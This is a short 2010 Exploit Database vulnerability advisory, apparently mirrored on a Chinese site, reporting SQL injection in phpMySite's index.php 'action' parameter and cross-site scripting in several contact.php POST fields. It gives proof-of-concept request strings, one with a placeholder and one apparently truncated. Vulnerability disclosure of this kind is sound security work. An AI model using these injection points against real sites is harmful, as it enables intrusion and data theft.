phpMySite – Cross-Site Scripting / SQL Injection

• Exploit Database
• 109 阅读

• 作者： Crux
  日期： 2010-02-27
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11588/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32

  ================================================================= [~] phpMySite (XSS/SQLi) Multiple Remote Vulnerabilities =================================================================   ########################################################## ## Author: Crux ## Homepage: http://hack-tech.com ## Date: 2-27-2010 ## Software Link: http://www.phpmysite.com/ ## Version: N/A ##########################################################   [ SQLi ] --------------------------------- // This vulnerability affects index.php // Can be exploited VIA the GET variable 'action'   [#] Exploit / POC index.php?action=${SQLINJECTIONHERE}&key=111-222-1933email@address.tst     [ XSS ] --------------------------------- // This vulnerability affects contact.php // Can be exploited via the following POST variables: // name, city, email, state, message   [#] Exploit / POC name=Crux&city=1>">&state=NY&email=sample%40email%2Etst&message=111-222-1933email@address.tst&word=111-222-1933email@address.tst   =================================================================